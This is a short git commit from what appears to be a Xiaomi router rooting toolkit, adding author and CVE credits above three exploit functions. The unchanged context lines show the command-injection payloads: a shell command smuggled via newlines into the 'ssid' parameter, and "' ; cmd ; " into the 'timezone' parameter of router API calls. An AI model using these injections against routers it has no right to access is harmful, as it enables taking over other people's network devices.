connect: Update vulnerabilities and exploits info

4 weeks ago · 27163b9b72
parent e34a3439c7
commit 27163b9b72
3 changed files with 13 additions and 0 deletions
--- a/connect2.py
+++ b/connect2.py
@ -41,6 +41,10 @@ stok = gw.web_login()


 def exec_cmd(cmd, api = 'API/misystem/set_config_iotdev'):
+    ######
+    # vuln/exploit author: LonGDikE
+    # publication: https://forum.openwrt.org/t/55049/62
+    ######
    params = { 'bssid': 'Xiaomi', 'user_id': '_username_', 'ssid': ('-h' + '\n' + cmd + '\n') }
    resp = gw.api_request(api, params)
    return resp
--- a/connect4.py
+++ b/connect4.py
@ -46,6 +46,10 @@ stok = gw.web_login()


 def exec_cmd(cmd, api = 'API/misystem/set_sys_time'):
+    ######
+    # vuln/exploit author: remittor
+    # publication: https://forum.openwrt.org/t/125008/132
+    ######
    resp = gw.api_request(api, { 'timezone': " ' ; " + cmd + " ; " })
    return resp

--- a/connect5.py
+++ b/connect5.py
@ -70,6 +70,11 @@ max_cmd_len = 100 - 1 - len(vuln_cmd)
 hackCheck = False

 def exec_smart_cmd(cmd, timeout = 7, api = 'API/xqsmarthome/request_smartcontroller'):
+    ######
+    # vuln/exploit author: Julien R. (SoEasY), Marin Duroyon
+    # reg_code: CVE-2023-26319
+    # publication: https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/
+    ######
    sc_command = cmd['command']
    payload = json.dumps(cmd, separators = (',', ':'))
    try: